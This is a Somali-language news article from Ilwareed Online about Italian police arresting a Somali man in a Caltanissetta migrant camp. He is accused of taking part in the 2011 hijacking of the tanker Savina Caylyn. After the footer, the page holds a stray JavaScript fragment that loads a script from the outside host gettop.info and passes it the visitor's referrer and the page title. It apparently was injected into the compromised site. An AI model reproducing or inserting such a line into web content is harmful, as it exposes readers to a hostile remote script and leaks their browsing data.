Booliska Talyaaniga oo Kaam Qoxooti Ka Dhex Qabtay Tahriibe Soomaaliyeed oo Ay Burcad-Badeednimo ku Eedeeyeen

Ilwareed Online

Booliska dalka Talyaaniga ayaa xabsiga u taxaabay wiil dhallinyaro oo soomaali ah kaas oo ay ku eedeeyeen burcad-badeednimo, iyagoona bar-gartay dabadeedna ka qabtay kaam lagu hayo qoxootiga tahriibka kusoo galay Talyaaniga.

Maxamed Faarax oo wiilkani lagu magacaabo islamarkaana jira da`da 24 ayaa lagu eedeynayaa in uu qeyb ka ahaa koox burcad-badeed ah kuwaas oo maraakiib badan ka qafaashay xeebaha Soomaaliya.

Wiilkan soomaaliga ah ayaa la bar-gartay kaddib markii uu qaab tahriib ah ku galay dalka Talyaaniga islamarkaana uu is dhiibay, waxaana faro laga qaaday ay shabeheen faro ku jiray keydka dambiilayaasha booliska Yurub.

Dabcan faraha keydka ku jiray ayaa waxaa laga soo qaaday markab uu qafaal u geystay wiilkan sannadkii 2011-kii kaas oo ay boolisku baaritaanka ka dib keydka gashteen si mustaqbalka loo raadsado.

Mr. Maxamed ayaa waxaa laga soo qabtay kaam ku yaal magaalada Caltanissetta, waxaana lagu eedeynayaa in uu qeyb ka ahaa qafaalka markab saliid sida oo laga lahaa dalka Talyaaniga islamarkaana lagu magacaabay Savina Caylyn sannadkii 2011-ka.

Shaqaalihii saarnaa markankaasi ayaa lagu sheegay 5 talyaani ah iyo 17 hindi ah, waxaana loo geystay jirdil, iyagoona la haystay muddo 10 bilood ah.

Markanka ayaa ugu dambeyn lagu sii daayay lacag dhan $11.5 million oo dollar.

Mogadishu – Somalia

Wixii warbixin ah waxaad noogu soo diri kartaa email: ilwareednet@gmail.com
fadlan like saar boggeena facebook : @ilwareedonline

The post Booliska Talyaaniga oo Kaam Qoxooti Ka Dhex Qabtay Tahriibe Soomaaliyeed oo Ay Burcad-Badeednimo ku Eedeeyeen appeared first on Ilwareed Online.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

You might also like More from author